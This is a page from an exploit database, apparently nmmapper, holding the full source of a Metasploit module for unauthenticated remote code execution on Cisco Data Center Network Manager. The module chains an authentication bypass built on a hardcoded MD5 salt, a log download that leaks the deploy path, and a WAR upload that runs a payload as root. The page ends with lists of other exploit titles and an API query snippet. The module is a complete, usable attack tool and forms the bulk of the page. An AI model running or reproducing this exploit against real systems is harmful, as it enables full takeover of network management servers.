Menu

Search for hundreds of thousands of exploits

"Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)"

Author

Metasploit

Platform

java

Release date

2019-09-03

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
      'Description'    => %q{
        DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
        An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
        directory and achieve remote code execution as root.
        This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
        versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
        directory for the WAR file upload.
        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
        (see References to understand why).
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-1619' ], # auth bypass
          [ 'CVE', '2019-1620' ], # file upload
          [ 'CVE', '2019-1622' ], # log download
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'Cisco DCNM 11.1(1)', {}
          ],
          [
            'Cisco DCNM 11.0(1)', {}
          ],
          [
            'Cisco DCNM 10.4(2)', {}
          ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => { 'WfsDelay' => 10 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 26 2019'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Connect with TLS', true]),
        OptString.new('TARGETURI', [true,  "Default server path", '/']),
        OptString.new('USERNAME', [true,  "Username for auth (required only for 11.0(1) and above", 'admin']),
        OptString.new('PASSWORD', [true,  "Password for auth (required only for 11.0(1) and above", 'admin']),
      ])
  end

  def check
    # at the moment this is the best way to detect
    # check if pmreport and fileUpload servlets return a 500 error with no params
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
      'vars_get'  =>
      {
        'token'  => rand_text_alpha(5..20)
      },
      'method' => 'GET'
    )
    if res && res.code == 500
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
        'method' => 'GET',
      )
      if res && res.code == 500
        return CheckCode::Detected
      end
    end

    CheckCode::Unknown
  end

  def target_select
    if target != targets[0]
      return target
    else
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'),
        'method' => 'GET'
      )
      if res && res.code == 200
        if res.body.include?('version":"11.1(1)')
          print_good("#{peer} - Detected DCNM 11.1(1)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[1]
        elsif res.body.include?('version":"11.0(1)')
          print_good("#{peer} - Detected DCNM 11.0(1)")
          print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
          return targets[2]
        elsif res.body.include?('version":"10.4(2)')
          print_good("#{peer} - Detected DCNM 10.4(2)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[3]
        else
          print_error("#{peer} - Failed to detect target version.")
          print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
          print_error(res.body)
          print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
          return targets[3]
        end
      end
      fail_with(Failure::NoTarget, "#{peer} - Failed to determine target")
    end
  end

  def auth_v11
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm/'),
      'method' => 'GET',
      'vars_get'  =>
      {
        'userName'  => datastore['USERNAME'],
        'password'  => datastore['PASSWORD']
      },
    )

    if res && res.code == 200
      # get the JSESSIONID cookie
      if res.get_cookies
        res.get_cookies.split(';').each do |cok|
          if cok.include?("JSESSIONID")
            return cok
          end
        end
      end
    end
  end

  def auth_v10
    # step 1: get a JSESSIONID cookie and the server Date header
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm/'),
      'method' => 'GET'
    )

    # step 2: convert the Date header and create the auth hash
    if res && res.headers['Date']
      jsession = res.get_cookies.split(';')[0]
      date = Time.httpdate(res.headers['Date'])
      server_date = date.strftime("%s").to_i * 1000
      print_good("#{peer} - Got sysTime value #{server_date.to_s}")

      # auth hash format:
      # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
      session_id = rand(1000..50000).to_s
      md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
        "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
      md5_str = Base64.strict_encode64(md5)

      # step 3: authenticate our cookie as admin
      # token format: sessionId.sysTime.md5_str.username
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
        'cookie' => jsession,
        'vars_get'  =>
        {
          'token'  => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
        },
        'method' => 'GET'
      )

      if res && res.code == 500
        return jsession
      end
    end
  end

  # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
  def get_war_path
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
      'method' => 'GET'
    )

    if res && res.code == 200
      tmp = Tempfile.new
      # we have to drop this into a file first
      # else we will get a Zip::GPFBit3Error if we use an InputStream
      File.binwrite(tmp, res.body)
      Zip::File.open(tmp) do |zis|
        zis.each do |entry|
          if entry.name =~ /jboss[0-9]*\.log/
            fdata = zis.read(entry)
            if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
              tmp.close
              tmp.unlink
              return $1.strip
            end
          end
        end
      end
    end
  end


  def exploit
    target = target_select

    if target == targets[2]
      jsession = auth_v11
    elsif target == targets[3]
      jsession = auth_v10
    end

    # targets[1] DCNM 11.1(1) doesn't need auth!
    if jsession.nil? && target != targets[1]
      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
    elsif target != targets[1]
      print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
    end

    war_path = get_war_path
    if war_path.nil? or war_path.empty?
      fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
    else
      print_good("#{peer} - Obtain WAR path from logs: #{war_path}")
    end

    # Generate our payload... and upload it
    app_base = rand_text_alphanumeric(6..16)
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    fname = app_base + '.war'
    post_data = Rex::MIME::Message.new
    post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"")
    post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"")
    post_data.add_part(war_payload,
                       "application/octet-stream", 'binary',
                       "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")
    data = post_data.to_s

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
      'method' => 'POST',
      'data'   => data,
      'cookie' => jsession,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    )

    if res && res.code == 200 && res.body[/#{fname}/]
      print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")

      sleep 10

      print_status("#{peer} - Executing payload...")
      send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, app_base),
        'method' => 'GET'
      )
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
    end
  end
end
Release Date Title Type Platform Author
2019-09-11 "AVCON6 systems management platform - OGNL Remote Command Execution" webapps java "Nassim Asrir"
2019-09-03 "Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)" remote java Metasploit
2019-07-12 "Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2019-07-12 "Sahi Pro 8.0.0 - Remote Command Execution" webapps java AkkuS
2019-06-17 "Spring Security OAuth - Open Redirector" webapps java Riemann
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting" webapps java Vingroup
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-21 "Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution" webapps java "Jakub Palaczynski"
2019-05-21 "Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection" webapps java omurugur
2019-04-30 "Spring Cloud Config 2.1.x - Path Traversal (Metasploit)" webapps java "Dhiraj Mishra"
2019-04-26 "Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting" webapps java "Dhiraj Mishra"
2019-04-08 "ManageEngine ServiceDesk Plus 9.3 - User Enumeration" webapps java "Alexander Bluestein"
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2016-12-20 "Java Debug Wire Protocol (JDWP) - Remote Code Execution" remote java IOactive
2019-02-25 "Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution" webapps java wetw0rk
2019-02-19 "Jenkins - Remote Code Execution" webapps java orange
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour" dos java "Google Security Research"
2019-02-05 "OpenMRS Platform < 2.24.0 - Insecure Object Deserialization" webapps java "Bishop Fox"
2019-01-28 "Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-10-24 "Apache OFBiz 16.11.04 - XML External Entity Injection" webapps java "Jamie Parfet"
2018-10-22 "Oracle Siebel CRM 8.1.1 - CSV Injection" webapps java "Sarath Nair"
2018-10-01 "ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
Release Date Title Type Platform Author
2019-09-10 "October CMS - Upload Protection Bypass Code Execution (Metasploit)" remote php Metasploit
2019-09-10 "LibreNMS - Collectd Command Injection (Metasploit)" remote linux Metasploit
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)" local windows Metasploit
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)" local windows Metasploit
2019-09-05 "AwindInc SNMP Service - Command Injection (Metasploit)" remote linux Metasploit
2019-09-03 "Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-09-03 "Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)" remote java Metasploit
2019-09-03 "Cisco UCS Director - default scpuser password (Metasploit)" remote unix Metasploit
2019-09-03 "ptrace - Sudo Token Privilege Escalation (Metasploit)" local linux Metasploit
2019-09-03 "ktsuss 1.4 - suid Privilege Escalation (Metasploit)" local linux Metasploit
2019-08-26 "Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)" local linux Metasploit
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2019-07-29 "WP Database Backup < 5.2 - Remote Code Execution (Metasploit)" remote php Metasploit
2019-07-29 "Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)" remote unix Metasploit
2019-07-17 "Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-16 "PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)" remote linux Metasploit
2019-07-16 "Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-03 "Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)" remote windows Metasploit
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47347/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47347/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47347/41707/cisco-data-center-network-manager-unauthenticated-remote-code-execution-metasploit/download/", "exploit_id": "47347", "exploit_description": "\"Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)\"", "exploit_date": "2019-09-03", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "java", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse